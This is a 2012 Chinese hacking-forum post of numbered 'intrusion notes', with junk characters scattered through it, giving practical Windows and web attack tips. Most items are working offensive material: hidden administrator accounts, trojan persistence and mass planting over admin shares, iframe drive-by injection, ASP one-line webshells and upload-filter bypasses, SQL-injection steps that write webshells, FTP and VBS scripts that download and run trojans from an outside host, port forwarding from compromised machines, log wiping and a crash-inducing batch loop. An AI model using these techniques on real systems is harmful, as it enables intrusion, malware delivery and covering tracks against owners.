中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]
作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
+ s5 G" B# a6 hcacls C:\windows\system32 /G hqw20:R! L$ d; R4 s4 a" E% d$ |0 q3 g
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
7 t& ~0 [, m1 n恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; m+ T, v: ]: U1 n; U+ D/ K
: a' w. X" h$ @9 N1 ?3 a9 O9 e6 A
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。# I: @2 H# X# g/ |
: }1 J! R( n# M6 a' J" i
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
) [7 v: o2 `6 S) n) c
+ Q- u% R: x* V4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号4 f4 t) V8 v3 {: I. ~

8 P, o" w' S5 a" ?' p1 V5、利用INF文件来修改注册表( u+ p2 f2 G$ |
[Version]
; P1 w" V+ K& O& fSignature="$CHICAGO$"& a5 i- F& |% a3 J+ s& \, J
[Defaultinstall]
1 x# q- x5 v4 K2 i2 V- laddREG=Ating; W% l9 V# O" |, m7 i
[Ating]4 E3 P- ~0 r5 e% Y& M3 }
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
" S+ m$ K& G6 B& b3 B以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:6 e' R7 G' Y! L; A$ U9 A. c% d
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- H+ O& o2 K/ p  ^: T8 o: n2 I
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
& R4 p% ^; j# t, S& b- GHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU' J( R# u. t6 L
HKEY_CURRENT_CONFIG 简写为 HKCC
: Z" X' K7 _2 o3 Z0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
3 K4 `/ v0 ^" o% H4 I2 }4 d"1"这里代表是写入或删除注册表键值中的具体数据
3 p7 U8 ~( y3 J) \3 F. T2 U
/ d/ m1 b9 ?( B8 g6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 u" e0 D! i$ u1 ~多了一步就是在防火墙里添加个端口,然后导出其键值! h# z6 L( V+ x
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]% m3 Q0 t4 y, d: o

1 k8 b9 d  b" q& h/ w# k7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
. R$ U. `: v; l' k: |- z: b& T& u在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。$ J6 q! I" F( |' {& Y8 M* k0 _

" T0 a( C+ Q/ S8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。9 V, y( a  ^! V0 h6 Q2 E8 c# ]
" Y" c- _4 y0 X2 @) a0 @
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,: a+ d$ z4 {* U
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。4 V1 ~5 P8 }/ n0 E) h) H

: A' G% y( a: G" M10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; d9 Y0 _0 b; j& C4 X

# \! ?+ h* v: J# s" B11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff," C; l; g4 R8 N& B1 L4 v  v* @0 h' a. f
用法:xsniff –pass –hide –log pass.txt& P% y5 q4 j/ a, a" `3 m6 w: s
3 o0 X# ^' @/ O! Y6 N& T
12、google搜索的艺术
2 I/ o: Y+ W6 A搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”( t# B( E, m! E3 H
或“字符串的语法错误”可以找到很多sql注入漏洞。+ P, s2 d8 n0 P1 m

) c' j* s5 n$ V0 W3 O( H0 r- P13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
* T, U$ y9 U5 V- a9 t. q% v" k# j1 I- C3 y' b
14、cmd中输入 nc –vv –l –p 1987" X' b( C& N7 q7 l5 J( x
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
' q' l3 `9 f) V  d; P' a% x; @6 d0 n) J
15、制作T++木马,先写个ating.hta文件,内容为2 K1 e4 }! r' t8 ~' K, k
<script language="VBScript">+ p9 Y. z( Q/ b; j2 H( C
set wshshell=createobject ("wscript.shell" )( P* M' f7 H3 A& s. p: I$ A9 A0 R2 i
a=wshshell.run("你马的名称",1)
% v5 }4 S) @0 ?; Jwindow.close' C  ?' Z* D% [  A9 B3 @! q
</script>. X3 c& x7 k# V" S! Y5 O+ i
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
$ c2 U2 a- t9 n7 h
6 h) k! K3 m9 r) O) J16、搜索栏里输入( j+ m, E: n/ V
关键字%'and 1=1 and '%'='. O9 o- t- ^$ v4 F" _
关键字%'and 1=2 and '%'='# Y- K, G4 `3 d4 ^) ^* I
比较不同处 可以作为注入的特征字符
# f+ Z$ Y  J/ X  m. m6 \) R7 ~; n  `3 A) N! Z8 {; k3 R
17、挂马代码<html>
9 p% }6 H, m% p: W; {3 A<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; d1 ?* r  \. s+ g</html>
  p' o( P+ W" q! _3 }; [3 u6 X. k; O  t, R) \2 o# l
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) Y( Q+ w) ]4 F$ p0 e; }+ inet localgroup administrators还是可以看出Guest是管理员来。
+ R5 \8 u6 D  P& {; a; j6 H8 a$ e/ }5 y1 L+ w
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等4 [# ^, G% O3 x
用法: 安装: instsrv.exe 服务名称 路径
* s# @% z/ P; C8 l; X  ^6 B卸载: instsrv.exe 服务名称 REMOVE) ~( K9 T/ l/ H& i1 t7 S6 R

, N# e$ P& P: [; m1 l; N; X. W6 W0 J
$ T& f. P+ N! f3 I9 ]1 d* e21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
9 J0 q. M0 m4 c+ y不能注入时要第一时间想到%5c暴库。$ V- X7 M7 e7 n/ @. U1 g* |

: E( X7 ]1 C0 h; l% c22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~* W2 @7 K$ p" g0 U0 \) M$ L
! _% }! J8 u3 @
23、缺少xp_cmdshell时0 _3 E# V9 O8 k7 P7 n& [
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! F  ]7 t8 b* ~( a- I+ m
假如恢复不成功,可以尝试直接加用户(针对开3389的)
3 m$ y5 u, a/ Z3 i( X" S* J% @declare @o int
) u" @* G1 ?: kexec sp_oacreate 'wscript.shell',@o out% b/ m" x% ]+ f; A
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员% ?0 I, }! i# k7 r

' q9 ^/ E, }9 P/ n' b4 Q24.批量种植木马.bat; F/ }: ]* I) p2 S8 U) v
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 b+ `$ }, _; u7 g! D; w6 @
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& l1 J! F9 g# \扫描地址.txt里每个主机名一行 用\\开头
) X; h' i3 M% l7 r) z. B
$ D/ v( I" U, F25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。. l6 F; \5 B  T$ S  {4 n# M; o
/ [# W& W- F. C& g5 W! ~! O( c. R
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& ~5 D. O! f6 W! V8 g. j将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.5 i% a/ g* J5 a& |( N
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马* Y6 G( e& E! q: b7 ~* f, j: j; J
* T3 @5 f' o1 E2 n
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
  t- T6 p  |& Y" x  x9 f( Z然后用#clear logg和#clear line vty *删除日志
& B. q) x) g; `& A
' }4 K. s! _& d6 [28、电脑坏了省去重新安装系统的方法+ a6 H- r# ?) S/ R
纯dos下执行,9 P# o  l0 a1 G8 \
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config0 K3 ?3 s# D% C
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
  n8 S  R0 o' Y) j2 v* |' }
, t* T9 s7 N& Y* b( n, ]29、解决TCP/IP筛选 在注册表里有三处,分别是:
: T5 J: Z. [* P5 t; M* SHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip: ?1 L5 Q, J! Q. e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, ~. t8 ~2 O0 GHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: c, r* l4 I$ }( V1 y' ?分别用  H* g6 ^% Q7 S- G: ^/ p) B6 ~
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, m$ r) }9 t% _* H1 T
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, d( }- Q% W+ A3 ^# Y% m0 ]1 Zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' n+ \0 W" ^! b5 h2 \% S, ?+ I' g* ]命令来导出注册表项
5 H6 ?6 D: f* P) ]. n8 t$ g8 H然后把三个文件里的EnableSecurityFilters"=dword:00000001,2 l/ ?. j0 e. I4 k8 i+ B  W
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用  T" P% b" G; n2 N, K
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。& r/ u$ J5 C* {: G) m

$ y  p% [. P' Q6 {8 I3 _30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U9 J5 v' C: T* m* g: ]) N& K
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的39 u, m" k% a" L& W: O  W

, U  G& [% P6 k. {31、全手工打造开3389工具
" D) i+ T# C9 R1 w! r! \1 H打开记事本,编辑内容如下:0 {; m0 @5 l% f
echo [Components] > c:\sql( ]! _9 d- [; u' d7 q' @( q$ R
echo TSEnable = on >> c:\sql& Y" ]0 T; |8 R
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q5 L' y$ v' H' C  s' D8 a, m  Q
编辑好后存为BAT文件,上传至肉鸡,执行
, Q; T$ N6 J$ K6 k) p: i: m% X
/ W" d) `* _+ l2 a7 j  w3 w5 }32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
4 U" ?7 Y; p: o+ m1 S5 p: O" U
* e: |3 x7 ?* V33、让服务器重启- Q. ]. t: y3 Y$ N
写个bat死循环:
; {& z" T# L1 d: y@echo off
4 y  {2 T! Q2 s:loop19 c9 {& w5 Y6 S  `9 z; e
cls
/ Q% q6 o* P. estart cmd.exe
# w( L. Q7 \6 G) g/ lgoto loop1# a7 z1 B! k: ?  d: i# q/ d. q
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! V# @9 N! \: r, b4 C- c

2 z, W0 z8 q0 q+ |6 j; m34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
2 f6 n9 h6 q" Y" `* j% b@echo off- l3 D4 {% {, l9 M. y8 O" u, q
date /t >c:/3389.txt# y6 g, v4 z+ c# K/ X- c7 g' v, ?. }
time /t >>c:/3389.txt  B. U, T- ?4 v# g+ Y) @6 M
attrib +s +h c:/3389.bat
8 d% e/ \; ^" [4 ?attrib +s +h c:/3389.txt
: |6 f  J" K! o* K$ e4 bnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
  v7 ]$ t% @( j! S) J  i并保存为3389.bat+ R: D- l3 M: p( {
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号, ~' e/ H( i  i# @
% @2 t$ p" ?) e2 u8 X- n8 t
35、有时候提不了权限的话,试试这个命令,在命令行里输入:6 |! I0 R% X% H7 @
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)  \# W( N) B0 v# d. I4 O, v
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。: M8 d+ \. b& Z" E  p1 B& w

6 i+ q2 l3 [4 ]36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件9 G9 h/ C( A: T
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址3 E9 ^8 W9 r: B# [
echo 你的FTP账号 >>c:\1.bat //输入账号
6 e3 A" D' l" g0 lecho 你的FTP密码 >>c:\1.bat //输入密码
! }( u3 M5 g. N2 H) O+ ^" m) secho bin >>c:\1.bat //登入
9 ?5 m% U8 w/ techo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么2 f+ s- J" g+ b) B& F
echo bye >>c:\1.bat //退出- s! o/ O& [# [
然后执行ftp -s:c:\1.bat即可
3 ?( J- d! k4 C, w' l# s
( n+ d* j0 Z3 c: ^! |37、修改注册表开3389两法8 }" x4 n8 U0 T+ R/ [
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 ~$ {8 j, l. _7 E4 N# |1 u8 Necho Windows Registry Editor Version 5.00 >>3389.reg
2 \) V; F( A/ s; Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg+ T9 {# C3 [" V# Q4 C- x; C
echo "Enabled"="0" >>3389.reg
/ y; y) i8 d, U0 }' B) j6 Q. Yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
( z9 d+ A+ A, |1 r1 N$ NNT\CurrentVersion\Winlogon] >>3389.reg
5 x( O& d7 T& ?2 }( G8 k3 j2 recho "ShutdownWithoutLogon"="0" >>3389.reg( Z) Z) d* p5 f/ y5 D7 k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
1 R+ H" [8 U0 O+ X5 f4 y>>3389.reg- Y% |; E5 I* Y" z' s" U5 N. `- e
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
: {5 `. \$ l; d# Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]" z& D1 P+ a) @" D( E* f
>>3389.reg! n& V: W/ }, v
echo "TSEnabled"=dword:00000001 >>3389.reg7 F: t( ?, r5 a5 w5 o8 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg8 \1 _6 M- T( Y: O( \8 {7 @
echo "Start"=dword:00000002 >>3389.reg- I6 b/ C; a6 k1 K4 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 m5 n/ m! E1 ^+ q; Y0 {>>3389.reg
1 ~$ E" U0 J' B: ^" m* P3 _echo "Start"=dword:00000002 >>3389.reg& o/ b# B! y8 P; N5 u0 R
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg6 c- M" Y/ C4 U5 p9 a' U
echo "Hotkey"="1" >>3389.reg6 @7 y8 l, H, J1 n+ x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) W% ]1 L  O+ DServer\Wds\rdpwd\Tds\tcp] >>3389.reg7 p4 Q5 `$ x+ q
echo "PortNumber"=dword:00000D3D >>3389.reg# n  q4 c1 N, z0 Z+ l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& ]; O; m. }5 u3 JServer\WinStations\RDP-Tcp] >>3389.reg
" K& i2 J4 ~3 o4 Fecho "PortNumber"=dword:00000D3D >>3389.reg
7 h9 |% M: [* W6 N# l" ~0 |; [把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。9 A! V/ L( a0 B/ S) Z* u
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): \; Q( L$ X  i- P! F
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效$ k/ k! m$ L0 D9 [" C3 n) w
(2)winxp和win2003终端开启
' n8 Y& K: O" ?3 @用以下ECHO代码写一个REG文件:9 M3 Y! ^& i* Y$ p' N& w! E$ \) P7 R6 P2 D
echo Windows Registry Editor Version 5.00>>3389.reg& H# z( B% x* C9 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) H9 ?. y  m1 o- f7 v# v( q' O9 L
Server]>>3389.reg% a2 `3 |; |$ t" B2 o
echo "fDenyTSConnections"=dword:00000000>>3389.reg
9 }4 S* z2 W/ Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' o" m- [4 V; L# \Server\Wds\rdpwd\Tds\tcp]>>3389.reg0 H, v1 S! p# P) q5 x
echo "PortNumber"=dword:00000d3d>>3389.reg6 B9 u2 q; |' w/ n' `& {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 ~4 |% O2 v$ _% e6 R8 c( j. h
Server\WinStations\RDP-Tcp]>>3389.reg
' V8 }5 O1 [* N5 y5 Hecho "PortNumber"=dword:00000d3d>>3389.reg
: C' j: C8 s3 g* z; V然后regedit /s 3389.reg del 3389.reg
5 l- @& K1 t+ u# q. gXP下不论开终端还是改终端端口都不需重启4 W" A/ N7 a* \9 h) ~

2 {- }6 L3 y% w: o  X$ O/ y2 m& W38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃5 a4 o& W" P& u# v& G8 L5 D
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
* c$ }" W: X( n* {; R7 Y
! g$ E  q& \9 }4 ]2 [' a39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!) i% A) Z0 P+ ^: N- G1 ]
(1)数据库文件名应复杂并要有特殊字符
( J2 x; f  ?- g(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
3 Z# N* p' @6 h) f2 Y5 p# O# I将conn.asp文档中的6 f" N% P4 o0 o" Y9 F
DBPath = Server.MapPath("数据库.mdb")7 M' ^& W, g* q" ?* t0 f
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
1 T4 P& M' B7 t4 Y  T* ^( r7 m; ^4 x8 k/ K( s+ s
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 E& m4 o9 I, H% X! C6 X+ t(3)不放在WEB目录里: }: v2 q6 |* B- Q6 T, f
6 J  S8 {3 i$ z" \. r
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉$ ^1 P2 T% I1 d2 k! ?
可以写两个bat文件7 F( h& z& i( G
@echo off
8 R7 |- u9 \9 H9 l$ O, i4 |! k8 h@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe3 e& I1 W2 [' k8 j9 o
@del c:\winnt\system32\query.exe
# p/ |) e/ p" I4 `@del %SYSTEMROOT%\system32\dllcache\query.exe* t' ~+ d$ y7 z7 s0 y) M1 F6 z
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的5 j& N3 y$ _8 H6 P- ]% ^  Z  w
  ^2 \% C4 }5 B; Z- y, K! X2 Z$ b, e5 C
@echo off
2 |% D, N" Y5 F& K3 k5 n% P# T0 J1 H' |@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe) f: V! J$ P. z# W
@del c:\winnt\system32\tsadmin.exe
- \1 A; M3 [# L! J( o@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
0 |1 K4 z+ m( i% j3 m+ [' J7 C0 {9 J/ A1 P  E! y) W. g
41、映射对方盘符3 K* x; n; G' N
telnet到他的机器上,# w; x" J5 s& z8 o$ Q9 \- G2 |2 f
net share 查看有没有默认共享 如果没有,那么就接着运行8 Z; U4 K' w" Z2 C
net share c$=c:7 D( O7 {& q! D; E: C' I8 j
net share现在有c$
: U8 o8 T: p- U; F+ @在自己的机器上运行
+ D8 n( D3 D8 d* U7 lnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, z7 e( D# n- P1 \: P9 B9 T8 Z

' n0 x9 |# p+ ~& a) J( C0 {; G" t1 D42、一些很有用的老知识% K- _7 e' q4 H- u" i  Q- z7 E6 e
type c:\boot.ini ( 查看系统版本 )) p/ \% P7 F# P0 g9 s$ K; E
net start (查看已经启动的服务)
/ U- p, b; r5 [/ squery user ( 查看当前终端连接 )
0 G) x! I8 ?5 z" Wnet user ( 查看当前用户 ), a3 w% ?8 r+ L. d  d9 a9 [
net user 用户 密码/add ( 建立账号 )
0 H7 w- D* _0 A3 J. E& Rnet localgroup administrators 用户 /add (提升某用户为管理员)1 j& p/ g6 P. q% L5 L1 o' \
ipconfig -all ( 查看IP什么的 )% Z" Y0 N# `( E$ I
netstat -an ( 查看当前网络状态 )( R8 b1 ?( }2 m% H1 _7 f
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)% ^  q2 e" E( p$ p2 P
克隆时Administrator对应1F4
' K  J4 J& Y0 }guest对应1F5
4 ]: O$ _" `1 A0 _0 Htsinternetuser对应3E8
8 z2 O+ Y( P7 j
6 Y: F$ A/ J, [. \- ~+ m( X43、如果对方没开3389,但是装了Remote Administrator Service3 D/ [& {6 p$ D/ Z/ L
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
  G6 ]; I" ]6 E5 H0 o6 g解释:用serv-u漏洞导入自己配制好的radmin的注册表信息( u  J% p1 h, l# D1 ^) C
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"8 G! y7 N( H7 u1 T8 I* S
/ B6 t+ D  T# L$ t+ {# P" l0 d) n
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( T0 d' o( x/ `' d本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
4 d% f! \) k; I) {
" t3 _# S# B7 u% |2 e  f45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)% ~7 N0 v' S( R9 j  u& Q  A
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open0 _* E# l9 N4 L1 e
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ ^' K, l$ W; Q7 N" rCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
& x) _" c' U) O: m4 `$ P1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
3 K$ Z6 h# G0 K9 z* ?8 W+ p. X(这是完整的一句话,其中没有换行符)
: y6 v0 f* [- `4 W( ]然后下载:" m3 U# k* ~7 ~+ c( P1 f0 E
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
- p( P6 ?" e" ^' o; E
0 e# e/ g2 N: N2 O46、一句话木马成功依赖于两个条件:% j  f: T6 ^: E3 F+ o6 B
1、服务端没有禁止adodb.Stream或FSO组件
' B# d/ w: [- S2 U' }9 r$ g9 t5 w2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。3 N2 r4 G* a; ?+ \
' V5 V, V: D& z( K. j& ~$ |0 L" t
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
1 ]; G5 N3 K( E) D;alter database utsz set RECOVERY FULL--  `. V) P" O, c- F; r* f
;create table cmd (a image)--/ V& d7 O3 L' X4 ~# Z7 b
;backup log utsz to disk = 'D:\cmd' with init--4 H9 K+ M) j0 w. g
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
& M* C( h2 h# _, U- j. R+ {1 b" \;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
. }* r2 z4 h5 T1 V6 ~注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% l* i( H9 L" a0 n+ K
5 t8 m* J* r( D! y& c4 O1 E48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:; Z2 {5 `! ?# ^1 c& F  u4 l3 O/ Y
' ~; X: C6 l& g2 e
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
7 D/ q6 Y! N; T1 W$ @# t所有会话用 'all'。
1 D4 _, U3 }) I- A% K; ^) {8 U3 [-s sessionid 列出会话的信息。. T4 X& b1 M  i  j2 ~3 E
-k sessionid 终止会话。6 ?1 }8 |7 m# E
-m sessionid 发送消息到会话。
- f/ t5 b9 w" w2 U8 i
. j8 H+ F) o5 s: wconfig 配置 telnet 服务器参数。
& V) B$ Z- c& j. G
  }2 D3 E& b- L/ \common_options 为:: D' d& z2 R2 I6 z" q
-u user 指定要使用其凭据的用户
0 {7 G0 t( n$ a2 g& p! R6 b-p password 用户密码6 h* x, D6 s" u7 n) d
5 O& l6 h9 P, H0 V
config_options 为:
9 X' G! B: |* ~/ ?3 d4 X* ~dom = domain 设定用户的默认域. W/ s$ z* l2 N) l5 l
ctrlakeymap = yes|no 设定 ALT 键的映射' y# |0 u% |" m
timeout = hh:mm:ss 设定空闲会话超时值
' m0 d* d: I8 P# U; d& M/ Ytimeoutactive = yes|no 启用空闲会话。! q! G: w" F6 H2 E
maxfail = attempts 设定断开前失败的登录企图数。
; c; b/ ?/ w4 Amaxconn = connections 设定最大连接数。% {9 U0 ~/ M% r( r
port = number 设定 telnet 端口。$ d0 h% h) e, k  I- b
sec = [+/-]NTLM [+/-]passwd7 d$ ^8 l. ~  O( Q9 u9 N, L3 Y3 q2 t! R8 q
设定身份验证机构
: \1 k5 D, L$ f+ e3 R( h. q, Efname = file 指定审计文件名。: N6 w$ Z( z. e( Y! ?3 d
fsize = size 指定审计文件的最大尺寸(MB)。
( q+ F( P- Q$ s; s6 ?4 x9 [mode = console|stream 指定操作模式。
- W* h  F" ^: y# Gauditlocation = eventlog|file|both
- s+ g  {  e  r* k+ M  Q+ e: u指定记录地点$ Z# P* E7 b5 g( Y, b
audit = [+/-]user [+/-]fail [+/-]admin
$ y/ r; r  E! ]8 t0 [( k' L2 G0 b: i2 T
49、例如:在IE上访问:9 X' _, Z+ G2 c. t  {) B
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/8 L) E! e+ l/ |& J  S
hack.txt里面的代码是:: n% M' b8 x4 m& q. p: }
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& R  X. y  @5 L; F把这个hack.txt发到你空间就可以了!- _5 ^8 \3 N0 H; ^, S: B
这个可以利用来做网马哦!$ F" y4 f8 s) p* f% O/ ~
3 t' C4 i% t$ S7 W
50、autorun的病毒可以通过手动限制!' }  _: v/ l/ X  D9 X. G
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 H3 \$ k% i! o6 j2,打开盘符用右键打开!切忌双击盘符~! L8 M6 N- W% j% B
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
" S4 F  ~( U  s. D; l/ U
6 w& E. }7 j2 o3 ]* x* I4 u51、log备份时的一句话木马:
1 s( D/ y9 D* ~6 Ka).<%%25Execute(request("go"))%%25>
8 Y( Z! U# H( L: eb).<%Execute(request("go"))%>
# k3 c$ s5 Z8 A1 t0 _3 c. d. vc).%><%execute request("go")%><%
% f5 _6 R9 T5 X" J. Q3 x( pd).<script language=VBScript runat=server>execute request("sb")</Script>" `( H) u/ Z8 r' _
e).<%25Execute(request("l"))%25>
* L7 T6 N% [) kf).<%if request("cmd")<>"" then execute request("pass")%>
6 D1 c7 |( }* m& |& [0 n. K  Y* Q9 N& w# S1 R
52、at "12:17" /interactive cmd& X6 d, `# L. b1 R: z
执行后可以用AT命令查看新加的任务; l) ?3 _0 v- Y) k0 g+ j
